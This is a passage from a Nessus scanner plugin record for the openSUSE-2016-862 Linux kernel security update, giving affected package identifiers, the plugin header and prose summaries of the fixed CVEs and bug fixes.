"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:libipset3", "p-cpe:/a:novell:opensuse:libipset3-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper", "p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:cloop", "p-cpe:/a:novell:opensuse:cloop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-debugsource", "p-cpe:/a:novell:opensuse:cloop-kmp-default", "p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-pae", "p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-xen", "p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:crash", "p-cpe:/a:novell:opensuse:crash-debuginfo", "p-cpe:/a:novell:opensuse:crash-debugsource", "p-cpe:/a:novell:opensuse:crash-devel", "p-cpe:/a:novell:opensuse:crash-eppic", "p-cpe:/a:novell:opensuse:crash-eppic-debuginfo", "p-cpe:/a:novell:opensuse:crash-gcore", "p-cpe:/a:novell:opensuse:crash-gcore-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-default", "p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae", "p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-xen", "p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-debugsource", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:ipset", "p-cpe:/a:novell:opensuse:ipset-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debugsource", "p-cpe:/a:novell:opensuse:ipset-devel", "p-cpe:/a:novell:opensuse:ipset-kmp-default", "p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch", "p-cpe:/a:novell:opensuse:openvswitch-controller", "p-cpe:/a:novell:opensuse:openvswitch-controller-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-debugsource", "p-cpe:/a:novell:opensuse:openvswitch-kmp-default", "p-cpe:/a:novell:opensuse:openvswitch-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop", "p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-kmp-pae", "p-cpe:/a:novell:opensuse:openvswitch-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-kmp-xen", "p-cpe:/a:novell:opensuse:openvswitch-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-pki", "p-cpe:/a:novell:opensuse:openvswitch-switch", "p-cpe:/a:novell:opensuse:openvswitch-switch-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-test", "p-cpe:/a:novell:opensuse:pcfclock", "p-cpe:/a:novell:opensuse:pcfclock-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:python-openvswitch", "p-cpe:/a:novell:opensuse:python-openvswitch-test", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-debugsource", "p-cpe:/a:novell:opensuse:vhba-kmp-default", "p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae", "p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-xen", "p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-source", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domu", "p-cpe:/a:novell:opensuse:xen-tools-domu-debuginfo", "p-cpe:/a:novell:opensuse:xen-xend-tools", "p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons", "p-cpe:/a:novell:opensuse:xtables-addons-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-debugsource", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo"], "id": "OPENSUSE-2016-862.NASL", "href": "https://www.tenable.com/plugins/nessus/92007", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-862.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92007);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-9717\", \"CVE-2015-8539\", \"CVE-2015-8816\", \"CVE-2016-1583\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2188\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3136\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-3689\", \"CVE-2016-3951\", \"CVE-2016-4482\", \"CVE-2016-4486\", \"CVE-2016-4569\", \"CVE-2016-4997\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2016-862)\");\n script_summary(english:\"Check for the openSUSE-2016-862 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"======================================================================\nThe openSUSE 13.1 kernel was updated to 3.12.59 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\n - CVE-2014-9717: fs/namespace.c in the Linux kernel\n processes MNT_DETACH umount2 system calls without\n verifying that the MNT_LOCKED flag is unset, which\n allowed local users to bypass intended access\n restrictions and navigate to filesystem locations\n beneath a mount by calling umount2 within a user\n namespace (bnc#928547).\n\n - CVE-2015-8539: The KEYS subsystem in the Linux kernel\n allowed local users to gain privileges or cause a denial\n of service (BUG) via crafted keyctl commands that\n negatively instantiate a key, related to\n security/keys/encrypted-keys/encrypted.c,\n security/keys/trusted.c, and\n security/keys/user_defined.c (bnc#958463).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bnc#968010 979064).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bnc#983143).\n\n - CVE-2016-2143: The fork implementation in the Linux\n kernel on s390 platforms mishandled the case of four\n page-table levels, which allowed local users to cause a\n denial of service (system crash) or possibly have\n unspecified other impact via a crafted application,\n related to arch/s390/include/asm/mmu_context.h and\n arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference or\n double free, and system crash) via a crafted endpoints\n value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#971124).\n\n - CVE-2016-2186: The powermate_probe function in\n drivers/input/misc/powermate.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970958).\n\n - CVE-2016-2188: The iowarrior_probe function in\n drivers/usb/misc/iowarrior.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#970956).\n\n - CVE-2016-2782: The treo_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint (bnc#961512 968670).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not\n limit the amount of unread data in pipes, which allowed\n local users to cause a denial of service (memory\n consumption) by creating many pipes with non-default\n sizes (bnc#970948 bnc#974646).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in\n drivers/usb/serial/mct_u232.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted USB device without two interrupt-in\n endpoint descriptors (bnc#970955).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in\n drivers/usb/serial/mct_u232.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted USB device without two interrupt-in\n endpoint descriptors (bnc#970955).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions (bnc#970970).\n\n - CVE-2016-3138: The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a USB device without both a control and a data endpoint\n descriptor (bnc#970911 970970).\n\n - CVE-2016-3140: The digi_port_init function in\n drivers/usb/serial/digi_acceleport.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970892).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux\n kernel mishandled destruction of device objects, which\n allowed guest OS users to cause a denial of service\n (host OS networking outage) by arranging for a large\n number of IP addresses (bnc#971360).\n\n - CVE-2016-3689: The ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (system crash) via a USB device without both a\n master and a slave interface (bnc#971628).\n\n - CVE-2016-3951: Double free vulnerability in\n drivers/net/usb/cdc_ncm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (system crash) or possibly have unspecified\n other impact by inserting a USB device with an invalid\n USB descriptor (bnc#974418).\n\n - CVE-2016-4482: The proc_connectinfo function in\n drivers/usb/core/devio.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call\n (bnc#978401 bsc#978445).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in\n net/core/rtnetlink.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-4569: The snd_timer_user_params function in\n sound/core/timer.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via crafted use of the ALSA timer interface\n (bnc#979213).\n\nThe following non-security bugs were fixed :\n\n - ALSA: timer: Call notifier in the same spinlock\n (bsc#973378).\n\n - ALSA: timer: Protect the whole snd_timer_close() with\n open race (bsc#973378).\n\n - ALSA: timer: Sync timer deletion at closing the system\n timer (bsc#973378).\n\n - ALSA: timer: Use mod_timer() for rearming the system\n timer (bsc#973378).\n\n - Add fs/ceph as a supported module.\n\n - Add mainline tags to some hyperv patches\n\n - Btrfs: do not collect ordered extents when logging that\n inode exists (bsc#977685).\n\n - Btrfs: fix deadlock between direct IO reads and buffered\n writes (bsc#973855).\n\n - Btrfs: fix empty symlink after creating symlink and\n fsync parent dir (bsc#977685).\n\n - Btrfs: fix file loss on log replay after renaming a file\n and fsync (bsc#977685).\n\n - Btrfs: fix file/data loss caused by fsync after rename\n and new inode (bsc#977685).\n\n - Btrfs: fix for incorrect directory entries after fsync\n log replay (bsc#957805, bsc#977685).\n\n - Btrfs: fix loading of orphan roots leading to BUG_ON\n (bsc#972844).\n\n - Btrfs: fix race between fsync and lockless direct IO\n writes (bsc#977685).\n\n - Btrfs: fix unreplayable log after snapshot delete +\n parent dir fsync (bsc#977685).\n\n - Btrfs: teach backref walking about backrefs with\n underflowed offset values (bsc#975371).\n\n - CacheFiles: Fix incorrect test for in-memory object\n collision (bsc#971049).\n\n - CacheFiles: Handle object being killed before being set\n up (bsc#971049).\n\n - Ceph: Remove racey watch/notify event infrastructure\n (bsc#964727)\n\n - Driver: Vmxnet3: set CHECKSUM_UNNECESSARY for IPv6\n packets (bsc#976739).\n\n - Drivers: hv: util: Pass the channel information during\n the init call (bnc#978527).\n\n - Drivers: hv: utils: Invoke the poll function after\n handshake (bnc#978527).\n\n - Drivers: hv: vmbus: Fix signaling logic in\n hv_need_to_signal_on_read().\n\n - Export helper function to set irq affinity in\n pci-hyperv.\n\n - FS-Cache: Add missing initialization of ret in\n cachefiles_write_page() (bsc#971049).\n\n - FS-Cache: Count culled objects and objects rejected due\n to lack of space (bsc#971049).\n\n - FS-Cache: Fix cancellation of in-progress operation\n (bsc#971049).\n\n - FS-Cache: Handle a new operation submitted against a\n killed object (bsc#971049).\n\n - FS-Cache: Move fscache_report_unexpected_submission() to\n make it more available (bsc#971049).\n\n - FS-Cache: Out of line fscache_operation_init()\n (bsc#971049).\n\n - FS-Cache: Permit fscache_cancel_op() to cancel\n in-progress operations too (bsc#971049).\n\n - FS-Cache: Put an aborted initialised op so that it is\n accounted correctly (bsc#971049).\n\n - FS-Cache: Reduce cookie ref count if submit fails\n (bsc#971049).\n\n - FS-Cache: Synchronise object death state change vs\n operation submission (bsc#971049).\n\n - FS-Cache: The operation cancellation method needs\n calling in more places (bsc#971049).\n\n - FS-Cache: Timeout for releasepage() (bsc#971049).\n\n - FS-Cache: When submitting an op, cancel it if the target\n object is dying (bsc#971049).\n\n - FS-Cache: fscache_object_is_dead() has wrong logic, kill\n it (bsc#971049).\n\n - Fix cifs_uniqueid_to_ino_t() function for s390x\n (bsc#944309)\n\n - Fix kabi issue (bsc#971049).\n\n - Import kabi files from kernel 3.12.55-52.42\n\n - Import kabi files from kernel 3.12.57-60.35\n\n - Input: i8042 - lower log level for 'no controller'\n message (bsc#945345).\n\n - KVM: x86: expose invariant tsc cpuid bit (v2)\n (bsc#971770).\n\n - NFSv4.1: do not use machine credentials for CLOSE when\n using 'sec=sys' (bsc#972003).\n\n - NVMe: Unify controller probe and resume (bsc#979347).\n\n - NVMe: init nvme queue before enabling irq (unknown bsc).\n\n - PCI/AER: Fix aer_inject error codes (bsc#931448).\n\n - PCI/AER: Log actual error causes in aer_inject\n (bsc#931448).\n\n - PCI/AER: Log aer_inject error injections (bsc#931448).\n\n - PCI/AER: Use dev_warn() in aer_inject (bsc#931448).\n\n - RDMA/ocrdma: Avoid reporting wrong completions in case\n of error CQEs (bsc#908151).\n\n - Remove VIOSRP_HOST_CONFIG_TYPE from ibmvstgt.c in\n patches.fixes/0001-ibmvscsi-remove-unsupported-host-conf\n ig-mad.patch. as well.\n\n - Revert 'scsi: fix soft lockup in scsi_remove_target() on\n module removal' (bsc#970609).\n\n - SUNRPC: Fix large reads on NFS/RDMA (bsc#908151).\n\n - SUNRPC: remove KERN_INFO from dprintk() call sites\n (bsc#908151).\n\n - USB: usbip: fix potential out-of-bounds write\n (bnc#975945).\n\n - Update patches.kernel.org/patch-3.12.55-56 references\n (add bsc#973570).\n\n - Update patches.suse/kgr-0102-add-TAINT_KGRAFT.patch\n (fate#313296 bsc#974406).\n\n - Use mainline variant of hyperv KVP IP failover patch\n (bnc#978527)\n\n - acpi: Disable ACPI table override when UEFI Secure Boot\n is enabled (bsc#970604).\n\n - acpi: Disable APEI error injection if securelevel is set\n (bsc#972891).\n\n - apparmor: Skip proc ns files (bsc#959514).\n\n - block: do not check request size in\n blk_cloned_rq_check_limits() (bsc#972124).\n\n -\n bnx2fc-Do-not-log-for-netevents-that-need-no-action.patc\n h\n\n - btrfs: do not return EBUSY on concurrent subvolume\n mounts (bsc#951844).\n\n - btrfs: handle non-fatal errors in btrfs_qgroup_inherit()\n (bsc#972951).\n\n - btrfs: qgroup: return EINVAL if level of parent is not\n higher than child's (bsc#972951).\n\n - cachefiles: perform test on s_blocksize when opening\n cache file (bsc#971049).\n\n - ceph fscache: Introduce a routine for uncaching single\n no data page from fscache (Fate#318586).\n\n - ceph fscache: Uncaching no data page from fscache in\n readpage() (Fate#318586).\n\n - ceph: Asynchronous IO support (Fate#318586).\n\n - ceph: Avoid to propagate the invalid page point\n (Fate#318586).\n\n - ceph: Clean up if error occurred in finish_read()\n (Fate#318586).\n\n - ceph: EIO all operations after forced umount\n (Fate#318586).\n\n - ceph: Implement writev/pwritev for sync operation\n (Fate#318586).\n\n - ceph: add acl for cephfs (Fate#318586).\n\n - ceph: add acl, noacl options for cephfs mount\n (Fate#318586).\n\n - ceph: add get_name() NFS export callback (Fate#318586).\n\n - ceph: add get_parent() NFS export callback\n (Fate#318586).\n\n - ceph: add imported caps when handling cap export message\n (Fate#318586).\n\n - ceph: add inline data to pagecache (Fate#318586).\n\n - ceph: add missing init_acl() for mkdir() and\n atomic_open() (Fate#318586).\n\n - ceph: add open export target session helper\n (Fate#318586).\n\n - ceph: add request to i_unsafe_dirops when getting unsafe\n reply (Fate#318586).\n\n - ceph: additional debugfs output (Fate#318586).\n\n - ceph: always re-send cap flushes when MDS recovers\n (Fate#318586).\n\n - ceph: avoid block operation when !TASK_RUNNING\n (ceph_mdsc_close_sessions) (Fate#318586).\n\n - ceph: avoid block operation when !TASK_RUNNING\n (ceph_get_caps) (Fate#318586).\n\n - ceph: avoid block operation when !TASK_RUNNING\n (ceph_mdsc_sync) (Fate#318586).\n\n - ceph: avoid releasing caps that are being used\n (Fate#318586).\n\n - ceph: avoid sending unnessesary FLUSHSNAP message\n (Fate#318586).\n\n - ceph: avoid useless ceph_get_dentry_parent_inode() in\n ceph_rename() (Fate#318586).\n\n - ceph: cast PAGE_SIZE to size_t in ceph_sync_write()\n (Fate#318586).\n\n - ceph: ceph_frag_contains_value can be boolean\n (Fate#318586).\n\n - ceph: ceph_get_parent() can be static (Fate#318586).\n\n - ceph: check OSD caps before read/write (Fate#318586).\n\n - ceph: check buffer size in ceph_vxattrcb_layout()\n (Fate#318586).\n\n - ceph: check caps in filemap_fault and page_mkwrite\n (Fate#318586).\n\n - ceph: check directory's completeness before emitting\n directory entry (Fate#318586).\n\n - ceph: check inode caps in ceph_d_revalidate\n (Fate#318586).\n\n - ceph: check unsupported fallocate mode (Fate#318586).\n\n - ceph: check zero length in ceph_sync_read()\n (Fate#318586).\n\n - ceph: checking for IS_ERR instead of NULL (Fate#318586).\n\n - ceph: cleanup unsafe requests when reconnecting is\n denied (Fate#318586).\n\n - ceph: cleanup use of ceph_msg_get (Fate#318586).\n\n - ceph: clear directory's completeness when creating file\n (Fate#318586).\n\n - ceph: convert inline data to normal data before data\n write (Fate#318586).\n\n - ceph: do not assume r_old_dentry[_dir] always set\n together (Fate#318586).\n\n - ceph: do not chain inode updates to parent fsync\n (Fate#318586).\n\n - ceph: do not grabs open file reference for aborted\n request (Fate#318586).\n\n - ceph: do not include ceph.(file,dir).layout vxattr in\n listxattr() (Fate#318586).\n\n - ceph: do not include used caps in cap_wanted\n (Fate#318586).\n\n - ceph: do not invalidate page cache when inode is no\n longer used (Fate#318586).\n\n - ceph: do not mark dirty caps when there is no auth cap\n (Fate#318586).\n\n - ceph: do not pre-allocate space for cap release messages\n (Fate#318586).\n\n - ceph: do not set r_old_dentry_dir on link()\n (Fate#318586).\n\n - ceph: do not trim auth cap when there are cap snaps\n (Fate#318586).\n\n - ceph: do not zero i_wrbuffer_ref when reconnecting is\n denied (Fate#318586).\n\n - ceph: drop cap releases in requests composed before cap\n reconnect (Fate#318586).\n\n - ceph: drop extra open file reference in\n ceph_atomic_open() (Fate#318586).\n\n - ceph: drop unconnected inodes (Fate#318586).\n\n - ceph: exclude setfilelock requests when calculating\n oldest tid (Fate#318586).\n\n - ceph: export ceph_session_state_name function\n (Fate#318586).\n\n - ceph: fetch inline data when getting Fcr cap refs\n (Fate#318586).\n\n - ceph: fix __dcache_readdir() (Fate#318586).\n\n - ceph: fix a comment typo (Fate#318586).\n\n - ceph: fix append mode write (Fate#318586).\n\n - ceph: fix atomic_open snapdir (Fate#318586).\n\n - ceph: fix bool assignments (Fate#318586).\n\n - ceph: fix cache revoke race (Fate#318586).\n\n - ceph: fix ceph_dir_llseek() (Fate#318586).\n\n - ceph: fix ceph_fh_to_parent() (Fate#318586).\n\n - ceph: fix ceph_removexattr() (Fate#318586).\n\n - ceph: fix ceph_set_acl() (Fate#318586).\n\n - ceph: fix ceph_writepages_start() (Fate#318586).\n\n - ceph: fix dcache/nocache mount option (Fate#318586).\n\n - ceph: fix dentry leaks (Fate#318586).\n\n - ceph: fix directory fsync (Fate#318586).\n\n - ceph: fix divide-by-zero in __validate_layout()\n (Fate#318586).\n\n - ceph: fix double page_unlock() in page_mkwrite()\n (Fate#318586).\n\n - ceph: fix dout() compile warnings in\n ceph_filemap_fault() (Fate#318586).\n\n - ceph: fix file lock interruption (Fate#318586).\n\n - ceph: fix flush tid comparision (Fate#318586).\n\n - ceph: fix flushing caps (Fate#318586).\n\n - ceph: fix llistxattr on symlink (Fate#318586).\n\n - ceph: fix message length computation (Fate#318586).\n\n - ceph: fix mksnap crash (Fate#318586).\n\n - ceph: fix NULL pointer dereference in\n send_mds_reconnect() (Fate#318586).\n\n - ceph: fix pr_fmt() redefinition (Fate#318586).\n\n - ceph: fix queuing inode to mdsdir's snaprealm\n (Fate#318586).\n\n - ceph: fix reading inline data when i_size > PAGE_SIZE\n (Fate#318586).\n\n - ceph: fix request time stamp encoding (Fate#318586).\n\n - ceph: fix reset_readdir() (Fate#318586).\n\n - ceph: fix setting empty extended attribute\n (Fate#318586).\n\n - ceph: fix sizeof(struct tYpO *) typo (Fate#318586).\n\n - ceph: fix snap context leak in error path (Fate#318586).\n\n - ceph: fix trim caps (Fate#318586).\n\n - ceph: fix uninline data function (Fate#318586).\n\n - ceph: flush cap release queue when trimming session caps\n (Fate#318586).\n\n - ceph: flush inline version (Fate#318586).\n\n - ceph: forbid mandatory file lock (Fate#318586).\n\n - ceph: fscache: Update object store limit after file\n writing (Fate#318586).\n\n - ceph: fscache: Wait for completion of object\n initialization (Fate#318586).\n\n - ceph: fscache: add an interface to synchronize object\n store limit (Fate#318586).\n\n - ceph: get inode size for each append write\n (Fate#318586).\n\n - ceph: handle -ESTALE reply (Fate#318586).\n\n - ceph: handle SESSION_FORCE_RO message (Fate#318586).\n\n - ceph: handle cap export race in try_flush_caps()\n (Fate#318586).\n\n - ceph: handle cap import atomically (Fate#318586).\n\n - ceph: handle frag mismatch between readdir request and\n reply (Fate#318586).\n\n - ceph: handle race between cap reconnect and cap release\n (Fate#318586).\n\n - ceph: handle session flush message (Fate#318586).\n\n - ceph: hold on to exclusive caps on complete directories\n (Fate#318586).\n\n - ceph: implement readv/preadv for sync operation\n (Fate#318586).\n\n - ceph: improve readahead for file holes (Fate#318586).\n\n - ceph: improve reference tracking for snaprealm\n (Fate#318586).\n\n - ceph: include time stamp in every MDS request\n (Fate#318586).\n\n - ceph: include time stamp in replayed MDS requests\n (Fate#318586).\n\n - ceph: initial CEPH_FEATURE_FS_FILE_LAYOUT_V2 support\n (Fate#318586).\n\n - ceph: initialize inode before instantiating dentry\n (Fate#318586).\n\n - ceph: introduce a new inode flag indicating if cached\n dentries are ordered (Fate#318586).\n\n - ceph: introduce ceph_fill_fragtree() (Fate#318586).\n\n - ceph: introduce global empty snap context 